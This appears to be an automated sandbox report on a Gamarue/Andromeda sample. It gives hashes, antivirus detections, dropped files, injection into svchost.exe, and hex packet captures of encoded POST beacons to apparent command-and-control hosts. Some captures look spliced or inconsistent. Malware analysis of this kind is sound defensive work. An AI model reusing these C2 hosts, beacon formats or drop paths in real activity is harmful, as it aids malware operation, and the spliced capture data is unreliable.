Analysis Date2018-04-19 22:57:59
MD5fdd2b38a046309996a7cda6c27c3fdb4
SHA1437bcf74b894e89cc5b6d675432b7ff04dcf43c4

Static Details:

AVArcabit (arcavir)Gen:Variant.Symmi.22996
AVAuthentiumW32/A-49bf794c!Eldorado
AVGrisoft (avg)Error Scanning File
AVAvira (antivir)TR/Rogue.22761
AVAlwil (avast)Downloader-TSN [Trj]
AVAd-AwareGen:Variant.Symmi.22996
AVBitDefenderGen:Variant.Symmi.22996
AVBullGuardError Scanning File
AVClamAVWin.Trojan.Downloader-61116
AVDr. WebBackDoor.Andromeda.178
AVEmsisoftGen:Variant.Symmi.22996
AVMicroWorld (escan)Gen:Variant.Symmi.22996
AVCA (E-Trust Ino)Error Scanning File
AVFortinetW32/Kryptik.BBYD!tr
AVFrisk (f-prot)W32/A-49bf794c!Eldorado
AVF-SecureTrojan-Downloader:W32/Wauchos.F
AVIkarusTrojan-Downloader.Win32.Andromeda
AVK7Trojan ( 0001140e1 )
AVKasperskyError Scanning File
AVMalwareBytesError Scanning File
AVMcafeeW32/Worm-FKU!FDD2B38A0463
AVMicrosoft Security EssentialsWorm:Win32/Gamarue.AJ
AVNANOTrojan.Win32.Andromeda.ccgyxx
AVEset (nod32)Win32/Injector.AIOX
AVPadvishNo Virus
AVCAT (quickheal)Worm.Gamarue.B
AVRisingTrojan.Win32.Read.a
AV360 SafeWorm.Win32.Gamarue.V
AVSUPERAntiSpywareTrojan.Agent/Gen-Dofoil
AVSymantecDownloader.Dromedan
AVTrend MicroWORM_GAMARUE.SMJ
AVTwisterTrojan.D875EDBFBC8E8805
AVVirusBlokAda (vba32)SScope.Worm.Gamarue.2713
AVWindows DefenderWorm:Win32/Gamarue.AJ
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe

Creates FileC:\Windows\SysWOW64\svchost.exe

Process
↳ C:\Windows\SysWOW64\svchost.exe

Creates Mutex
Creates Mutex3770066751
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\Users\Phil\AppData\Local\Temp\437bcf74b894e89cc5b6d675432b7ff04dcf43c4.exe
Creates FileC:\ProgramData\Local Settings\Temp\cchyaywf.exe
Creates FileC:\Windows\SysWOW64\svchost.exe
Creates FileC:\ProgramData\Local Settings\Temp\cchyaywf.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7374 61746963 2e706870   POST /static.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   206d6f72 70686564 2e72750d 0a557365    morphed.ru..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 340d0a43 6f6e6e65   ength: 84..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 7258387a 554e3638   nYKGIwiLrX8zUN68
0x000000c0 (00192)   54337971 76685175 32547165 74513738   T3yqvhQu2TqetQ78
0x000000d0 (00208)   726f7937 5136626f 54664455 74594966   roy7Q6boTfDUtYIf
0x000000e0 (00224)   745a3333 4e686b45 4b517367 396d5933   tZ33NhkEKQsg9mY3
0x000000f0 (00240)   71773d3d                              qw==

0x00000000 (00000)   504f5354 202f326c 64722e70 68702048   POST /2ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f336c 64722e70 68702048   POST /3ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==

0x00000000 (00000)   504f5354 202f3431 6c64722e 70687020   POST /41ldr.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   616d6e73 72656975 6f6a792e 72750d0a   amnsreiuojy.ru..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e300d 0a436f6e 74656e74   lla/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a6e2f78 2d777777 2d666f72 6d2d7572   .n/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   504f5354 202f3531 6c64722e 70687020   POST /51ldr.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   616d6e73 72656975 6f6a792e 72750d0a   amnsreiuojy.ru..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e300d 0a436f6e 74656e74   lla/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203834 0d0a436f   t-Length: 84..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c72 58387a55   +JmnYKGIwiLrX8zU
0x000000c0 (00192)   4e363854 33797176 68517532 54716574   N68T3yqvhQu2Tqet
0x000000d0 (00208)   51373872 6f793751 36626f54 66445574   Q78roy7Q6boTfDUt
0x000000e0 (00224)   59496674 5a33334e 686b454b 51736739   YIftZ33NhkEKQsg9
0x000000f0 (00240)   6d593371 773d3d                       mY3qw==

0x00000000 (00000)   504f5354 202f366c 64722e70 68702048   POST /6ldr.php H
0x00000010 (00016)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x00000020 (00032)   6d6e7372 6569756f 6a792e72 750d0a55   mnsreiuojy.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d3d                       Y3qw===

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a2f782d 7777772d 666f726d 2d75726c   ./x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7258 387a554e   JmnYKGIwiLrX8zUN
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   3738726f 79375136 626f5466 44557459   78roy7Q6boTfDUtY
0x000000e0 (00224)   4966745a 33334e68 6b454b51 7367396d   IftZ33NhkEKQsg9m
0x000000f0 (00240)   59337177 3d3d3d                       Y3qw===


Strings